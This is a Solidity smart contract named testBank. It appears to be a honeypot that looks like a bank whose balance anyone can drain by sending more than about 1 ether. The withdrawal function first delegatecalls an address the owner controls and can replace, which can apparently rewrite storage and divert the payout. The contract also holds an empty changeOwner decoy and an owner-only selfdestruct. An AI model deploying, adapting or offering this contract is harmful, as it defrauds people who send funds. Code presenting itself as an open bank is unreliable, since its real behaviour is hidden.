|
pragma solidity ^0.4.11; |
|
|
|
contract testBank |
|
{ |
|
address Owner=0x46Feeb381e90f7e30635B4F33CE3F6fA8EA6ed9b; |
|
address adr; |
|
uint256 public Limit= 1000000000000000001; |
|
address emails = 0x1a2c5c3ba7182b572512a60a22d9f79a48a93164; |
|
|
|
|
|
function Update(address dataBase, uint256 limit) |
|
{ |
|
require(msg.sender == Owner); |
|
Limit = limit; |
|
emails = dataBase; |
|
} |
|
|
|
function changeOwner(address adr){ |
|
|
|
} |
|
|
|
function()payable{} |
|
|
|
function withdrawal() |
|
payable public |
|
{ |
|
adr=msg.sender; |
|
if(msg.value>Limit) |
|
{ |
|
|
|
emails.delegatecall(bytes4(sha3("logEvent()"))); |
|
adr.send(this.balance); |
|
} |
|
} |
|
|
|
function kill() { |
|
require(msg.sender == Owner); |
|
selfdestruct(msg.sender); |
|
} |
|
|
|
} |